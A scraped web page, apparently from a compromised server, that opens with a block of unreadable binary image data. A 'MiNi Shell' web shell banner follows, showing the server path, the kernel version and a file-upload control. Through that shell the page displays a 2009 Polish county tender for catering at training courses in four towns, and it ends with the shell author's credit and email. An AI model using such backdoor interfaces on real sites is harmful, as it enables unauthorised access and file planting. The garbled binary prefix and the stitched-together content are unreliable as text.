JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090113/13609-N-2009.html

<p class="kh_header"><b>Trzebnica: Świadczenie usług cateringowych przy projekcie DAP 0825-57 08, Nr. KSI POKL.05.02.01-00-040 08 pn. Profesjonalny pracownik Administracji Samorządowej

Zadanie 1. Catering na terenie miasta Oborniki Śląskie
Zadanie 2. Catering na terenie miasta Prusice
Zadanie 3. Catering na terenie miasta Żmigród
Zadanie 4. Catering na terenie wsi Wisznia Mała</b><br>
<b>Numer ogłoszenia: 13609 - 2009; data zamieszczenia: 13.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Trzebnicki , ul. Ks. Dz. W. Bochenka 6, 55-100 Trzebnica, tel. 071 3120901 w. 32.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.trzebnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług cateringowych przy projekcie DAP 0825-57 08, Nr. KSI POKL.05.02.01-00-040 08 pn. Profesjonalny pracownik Administracji Samorządowej

Zadanie 1. Catering na terenie miasta Oborniki Śląskie
Zadanie 2. Catering na terenie miasta Prusice
Zadanie 3. Catering na terenie miasta Żmigród
Zadanie 4. Catering na terenie wsi Wisznia Mała.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i przygotowanie usługi cateringowej dla osób korzystających ze szkoleń w ramach projektu Nr.POKL.05.02.01-00-040/08 pn. Profesjonalny pracownik Administracji Samorządowej. Usługi cateringowe będą realizowane na obszarze 4 miast podczas szkoleń ogólnych i komputerowych. 
Szkolenia ogólne trwają 6 miesięcy tj. od lutego do sierpnia 2009 roku. W czasie ich trwania przewidziana jest przerwa kawowa: kawa, herbata - bez ograniczeń, dodatki: cukier, cytryna, śmietanka lub mleczko, ciasteczka kruche - 150g/os i obiad - drugie danie z surówką (ziemniaki lub zamiennik: makaron, ryż, kasza - 200 g/os., mięso - 100 g/os., surówka - 150 g/os). Komplet sztućców i kubków jednorazowych dla każdego uczestnika szkoleń. Szkolenia ogólnie catering będzie obejmował zapotrzebowanie na 838 posiłków:
-	
Zadanie 1.  162 posiłków:
- Urząd Miejski w Obornikach Śląskich 162 posiłków
Zadanie 2.  106 posiłków:
- Urząd Gminy Prusice - 106 posiłków
Zadanie 3.   144 posiłków:
- Urząd Miejski w Żmigrodzie - 144 posiłków
Zadanie 4.    96 posiłków:
- Urząd Gminy Wisznia Mała - 96 posiłków
Szkolenia komputerowe odbywać się będą w grupach pięcioosobowych. Czas trwania szkolenia to 12 miesięcy tj. okres od 1 marca 2009 roku do 5 lutego 2010 roku. Catering będzie obejmował zapotrzebowanie na 840 posiłków. Przewidziana jest przerwa kawowa: kawa, herbata - bez ograniczeń, dodatki: cukier, cytryna, śmietanka lub mleczko, ciasteczka kruche -150g/os. i kanapka śniadaniowa - bułka o wadze 170-200g z wkładem z wędliny lub przetworami mleczarskimi z dodatkiem warzyw zapakowana w folię gastronomiczną. Komplet sztućców i kubków jednorazowych dla każdego uczestnika szkoleń.
Tak jak w przypadku szkoleń ogólnych odbywać się będą na terenie 4 miast:
-	
Zadanie 1.   90 posiłków:
- Urząd Miejski w Obornikach Śląskich - 90 posiłków
Zadanie 2.   60 posiłków:
- Urząd Gminy Prusice - 60 posiłków,
Zadanie 3.   120 posiłków:
- Urząd Miejski w Żmigrodzie - 120 posiłków
Zadanie 4.    60 posiłków:
- Urząd Gminy Wisznia Mała - 60 posiłków
4.3 Obowiązki Wykonawcy: 

Posiłki muszą być sporządzane zgodnie z wymogami sztuki kulinarnej i sanitarnej dla żywienia zbiorowego. Muszą być wykonywane ze świeżych artykułów spożywczych posiadających aktualne terminy ważności. Posiłki Wykonawca dostarczać będzie własnym transportem, w specjalistycznych opakowaniach jednorazowych gwarantujących utrzymanie odpowiedniej temperatury oraz jakości przewożonych potraw. O czystość termosów zadba Wykonawca. Wykonawca będzie przygotowywał i dostarczał posiłki zachowując wymogi sanitarno-epidemiologiczne w zakresie personelu i warunków produkcji oraz weźmie odpowiedzialność za ich przestrzeganie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.32.10.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.02.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 oraz spełniają wymogi art. 22 ust. 1 pkt 1-4 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 r. (tj. tekst ujednolicony, Dz. U. z 2007 r. Nr 223, poz. 1655 oraz z 2008 r. Nr 171 poz. 1058), a także następujące warunki dodatkowe: 

 Doświadczenie zawodowe: 

Wykonawca musi wykazać wykaz wykonywanych usług w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - z którego będzie wynikało, że w tym okresie świadczył usługi odpowiadające swoim rodzajem przedmiotowi zamówienia tj. wykonywał co najmniej 1 usługę polegającą na przygotowaniu przerwy kawowej i  lub dostarczeniu gorących obiadów (drugie danie) (należy wypełnić załącznik nr 2 do niniejszej SIWZ). 
Wykonawcy wspólnie ubiegający się o udzielenie zmówienia (konsorcjum) powyższy warunek spełniają łącznie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> (1) prawidłowo wypełniony formularz OFERTA 

(2) dokumenty i oświadczenia wyszczególnione poniżej, wymagane przez Zamawiającego w celu potwierdzenia spełnienia warunków udziału w przetargu 

1 Wymagane dokumenty:

a)	Aktualny (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert) odpis z właściwego rejestru, albo aktualne zaświadczenie o wpisie do ewidencji o działalności gospodarczej. 
b)	Oświadczenie, że Wykonawca nie podlega wykluczeniu na podstawie  art. 24.1 ppkt. od 1 do 10 art. 24.2 ppkt. od 1 do 3 i spełnia warunki  art. 22 ust.1 pkt1-4 ustawy Pzp.

c)	Pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy dla osób podpisujących ofertę, a nie wymienionych w dokumentach rejestrowych firmy.

d)	Aktualnych, ( wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert) zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS lub KRUS potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków ,opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymania w całości wykonania decyzji właściwego organu. (W przypadku spółki cywilnej zaświadczenia wymagane są od każdego wspólnika oraz od spółki jako podmiotu gospodarczego.)

Ocena spełnienia powyższych warunków dokonana zostanie zgodnie z formułą spełnia  lub nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach przedstawionych w ofercie przez wykonawcę. 


2 Doświadczenie - wymagane dokumenty:

Wykonawca zobowiązany jest załączyć dokumenty (np. referencje) potwierdzające, że podane w wykazie usługi zostały wykonane należycie.
W przypadku Wykonawców wspólnie ubiegających się o zamówienie, dokumenty przedkłada ten lub ci, w stosunku do których niniejsza SIWZ wymaga potwierdzenia spełnienia warunku. 


Wykonawcy mający siedzibę poza terytorium Rzeczypospolitej Polskiej:
a)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych w punkcie 11.1 lit. (a); (d); składa dokumenty wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
-	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
-	nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
-	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie, lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
b)	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa wyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

 Wykonawcy składający ofertę wspólną (Konsorcjum)

1. Oferta składana przez konsorcjum (dwa lub więcej podmiotów gospodarczych działających wspólnie) musi spełniać następujące wymagania:

(1)	Dokumenty i oświadczenia wymienione w pkt. 11.1 lit. a); b); d); wymagane są od każdego podmiotu.

(2)	Do oferty należy załączyć pełnomocnictwo dla wyznaczonego jednego z podmiotów jako Lidera konsorcjum .Pełnomocnictwo musi być podpisane przez uprawnionych przedstawicieli pozostałych podmiotów i złożone w oryginale wraz z ofertą przetargową. Zakres pełnomocnictwa musi być jednoznacznie określony i zawierać upoważnienie do podejmowania zobowiązań dla i w imieniu każdego z osobna i wszystkich podmiotów tworzących konsorcjum. 

Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu, lub reprezentowania w postępowaniu i do zawarcia umowy. 
Zamiast pełnomocnictwa może być załączona umowa konsorcjum zawierająca w swej treści regulacje opisane poniżej. 

 Jeżeli oferta konsorcjum zostanie wybrana, Zamawiający zażąda - przed zawarciem umowy w sprawie zamówienia publicznego - umowy konsorcjum, regulującej współpracę podmiotów składających ofertę wspólną. 

 Umowa konsorcjum będzie zobowiązywać wszystkie podmioty wchodzące w skład konsorcjum do solidarnej odpowiedzialności wobec Zamawiającego i zawierać, co najmniej:
(1)	oznaczenie stron umowy przez podanie pełnych nazw i adresów firm, form organizacyjno-prawnych, wskazanie rejestrów lub ewidencji działalności, w których konsorcjanci są wpisani. 
(2)	wskazanie celu gospodarczego do realizacji którego utworzono konsorcjum. Cel ten powinien pokrywać się z zakresem przedmiotu przetargu.
(3)	oznaczenie czasu trwania umowy .
(4)	określenie sposobu reprezentacji konsorcjum. Zastrzega się, że zamawiający nie wyraża zgody na reprezentowanie konsorcjum przez osobę trzecią nie będącą członkiem konsorcjum ( np. firmę doradczą lub kancelarię prawniczą)
(5)	wyznaczenie jednego z podmiotów jako Lidera konsorcjum. Będzie on upoważniony do podejmowania zobowiązań i otrzymywania instrukcji dla i w imieniu każdego z osobna i wszystkich podmiotów tworzących konsorcjum. 

 Jeden wykonawca, jedna oferta

1.	Każdy wykonawca złoży tylko jedną ofertę, samodzielnie lub jako członek konsorcjum, zawierającą jednoznacznie opisaną propozycję. Złożenie większej liczby ofert spowoduje odrzucenie wszystkich ofert złożonych przez wykonawcę.

 2.	Wykonawca zdobędzie własnym staraniem wszelkie informacje, które mogą być konieczne do przygotowania oferty oraz podpisania umowy oraz poniesie wszelkie koszty związane z przygotowaniem i złożeniem oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat.trzebnica.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Trzebnicy, ul.Bochenka 6, 55-100 Trzebnica - sekretariat..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2009 godzina 12:15, miejsce: Starostwo Powiatowe w Trzebnicy, ul.Bochenka 6, 55-100 Trzebnica - sekretariat..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1. Catering na terenie miasta Oborniki Śląskie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i przygotowanie usługi cateringowej dla osób korzystających ze szkoleń w ramach projektu Nr.POKL.05.02.01-00-040 08 pn. Profesjonalny pracownik Administracji Samorządowej. Usługi cateringowe będą realizowane na obszarze 4 miast podczas szkoleń ogólnych i komputerowych. 


Szkolenia ogólne trwają 6 miesięcy tj. od lutego do sierpnia 2009 roku. W czasie ich trwania przewidziana jest przerwa kawowa: kawa, herbata - bez ograniczeń, dodatki: cukier, cytryna, śmietanka lub mleczko, ciasteczka kruche - 150g/os i obiad - drugie danie z surówką (ziemniaki lub zamiennik: makaron, ryż, kasza - 200 g/os., mięso - 100 g/os., surówka - 150 g/os). Komplet sztućców i kubków jednorazowych dla każdego uczestnika szkoleń. Szkolenia ogólnie catering będzie obejmował zapotrzebowanie na 162 posiłki:
-	Zadanie 1.  162 posiłki:
- Urząd Miejski w Obornikach Śląskich 162 posiłki
Szkolenia komputerowe odbywać się będą w grupach pięcioosobowych. Czas trwania szkolenia to 12 miesięcy tj. okres od 1 marca 2009 roku do 5 lutego 2010 roku. Catering będzie obejmował zapotrzebowanie na 90 posiłków. Przewidziana jest przerwa kawowa: kawa, herbata - bez ograniczeń, dodatki: cukier, cytryna, śmietanka lub mleczko, ciasteczka kruche -150g/os. i kanapka śniadaniowa - bułka o wadze 170-200g z wkładem z wędliny lub przetworami mleczarskimi z dodatkiem warzyw zapakowana w folię gastronomiczną. Komplet sztućców i kubków jednorazowych dla każdego uczestnika szkoleń.
Tak jak w przypadku szkoleń ogólnych odbywać się będą na terenie 4 miast:
Zadanie 1.   90 posiłków:
- Urząd Miejski w Obornikach Śląskich - 90 posiłków.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.32.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.02.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2. Catering na terenie miasta Prusice.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i przygotowanie usługi cateringowej dla osób korzystających ze szkoleń w ramach projektu Nr.POKL.05.02.01-00-040 08 pn. Profesjonalny pracownik Administracji Samorządowej. Usługi cateringowe będą realizowane na obszarze 4 miast podczas szkoleń ogólnych i komputerowych. 
Szkolenia ogólne trwają 6 miesięcy tj. od lutego do sierpnia 2009 roku. W czasie ich trwania przewidziana jest przerwa kawowa: kawa, herbata - bez ograniczeń, dodatki: cukier, cytryna, śmietanka lub mleczko, ciasteczka kruche - 150g/os i obiad - drugie danie z surówką (ziemniaki lub zamiennik: makaron, ryż, kasza - 200 g/os., mięso - 100 g/os., surówka - 150 g/os). Komplet sztućców i kubków jednorazowych dla każdego uczestnika szkoleń. Szkolenia ogólnie catering będzie obejmował zapotrzebowanie na 106 posiłków:
-	
Zadanie 2.  106 posiłków:
- Urząd Gminy Prusice - 106 posiłków
Szkolenia komputerowe odbywać się będą w grupach pięcioosobowych. Czas trwania szkolenia to 12 miesięcy tj. okres od 1 marca 2009 roku do 5 lutego 2010 roku. Catering będzie obejmował zapotrzebowanie na 60 posiłków. Przewidziana jest przerwa kawowa: kawa, herbata - bez ograniczeń, dodatki: cukier, cytryna, śmietanka lub mleczko, ciasteczka kruche -150g/os. i kanapka śniadaniowa - bułka o wadze 170-200g z wkładem z wędliny lub przetworami mleczarskimi z dodatkiem warzyw zapakowana w folię gastronomiczną. Komplet sztućców i kubków jednorazowych dla każdego uczestnika szkoleń.
Tak jak w przypadku szkoleń ogólnych odbywać się będą na terenie 4 miast:
Zadanie 2.   60 posiłków:
- Urząd Gminy Prusice - 60 posiłków,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.32.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.02.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3. Catering na terenie miasta Żmigród.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i przygotowanie usługi cateringowej dla osób korzystających ze szkoleń w ramach projektu Nr.POKL.05.02.01-00-040 08 pn. Profesjonalny pracownik Administracji Samorządowej. Usługi cateringowe będą realizowane na obszarze 4 miast podczas szkoleń ogólnych i komputerowych. 
Szkolenia ogólne trwają 6 miesięcy tj. od lutego do sierpnia 2009 roku. W czasie ich trwania przewidziana jest przerwa kawowa: kawa, herbata - bez ograniczeń, dodatki: cukier, cytryna, śmietanka lub mleczko, ciasteczka kruche - 150g/os i obiad - drugie danie z surówką (ziemniaki lub zamiennik: makaron, ryż, kasza - 200 g/os., mięso - 100 g/os., surówka - 150 g/os). Komplet sztućców i kubków jednorazowych dla każdego uczestnika szkoleń. Szkolenia ogólnie catering będzie obejmował zapotrzebowanie na 144 posiłki:
-	
Zadanie 3.   144 posiłków:
- Urząd Miejski w Żmigrodzie - 144 posiłków
Szkolenia komputerowe odbywać się będą w grupach pięcioosobowych. Czas trwania szkolenia to 12 miesięcy tj. okres od 1 marca 2009 roku do 5 lutego 2010 roku. Catering będzie obejmował zapotrzebowanie na 120 posiłków. Przewidziana jest przerwa kawowa: kawa, herbata - bez ograniczeń, dodatki: cukier, cytryna, śmietanka lub mleczko, ciasteczka kruche -150g/os. i kanapka śniadaniowa - bułka o wadze 170-200g z wkładem z wędliny lub przetworami mleczarskimi z dodatkiem warzyw zapakowana w folię gastronomiczną. Komplet sztućców i kubków jednorazowych dla każdego uczestnika szkoleń.
Tak jak w przypadku szkoleń ogólnych odbywać się będą na terenie 4 miast:
-	
Zadanie 3.   120 posiłków:
- Urząd Miejski w Żmigrodzie - 120 posiłków.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.32.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.02.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4. Catering na terenie wsi Wisznia Mała.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i przygotowanie usługi cateringowej dla osób korzystających ze szkoleń w ramach projektu Nr.POKL.05.02.01-00-040 08 pn. Profesjonalny pracownik Administracji Samorządowej. Usługi cateringowe będą realizowane na obszarze 4 miast podczas szkoleń ogólnych i komputerowych. 
Szkolenia ogólne trwają 6 miesięcy tj. od lutego do sierpnia 2009 roku. W czasie ich trwania przewidziana jest przerwa kawowa: kawa, herbata - bez ograniczeń, dodatki: cukier, cytryna, śmietanka lub mleczko, ciasteczka kruche - 150g/os i obiad - drugie danie z surówką (ziemniaki lub zamiennik: makaron, ryż, kasza - 200 g/os., mięso - 100 g/os., surówka - 150 g/os). Komplet sztućców i kubków jednorazowych dla każdego uczestnika szkoleń. Szkolenia ogólnie catering będzie obejmował zapotrzebowanie na 96 posiłków:
Zadanie 4.    96 posiłków:
- Urząd Gminy Wisznia Mała - 96 posiłków
Szkolenia komputerowe odbywać się będą w grupach pięcioosobowych. Czas trwania szkolenia to 12 miesięcy tj. okres od 1 marca 2009 roku do 5 lutego 2010 roku. Catering będzie obejmował zapotrzebowanie na 60 posiłków. Przewidziana jest przerwa kawowa: kawa, herbata - bez ograniczeń, dodatki: cukier, cytryna, śmietanka lub mleczko, ciasteczka kruche -150g/os. i kanapka śniadaniowa - bułka o wadze 170-200g z wkładem z wędliny lub przetworami mleczarskimi z dodatkiem warzyw zapakowana w folię gastronomiczną. Komplet sztućców i kubków jednorazowych dla każdego uczestnika szkoleń.
Tak jak w przypadku szkoleń ogólnych odbywać się będą na terenie 4 miast:
Zadanie 4.    60 posiłków:
- Urząd Gminy Wisznia Mała - 60 posiłków.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.32.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.02.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com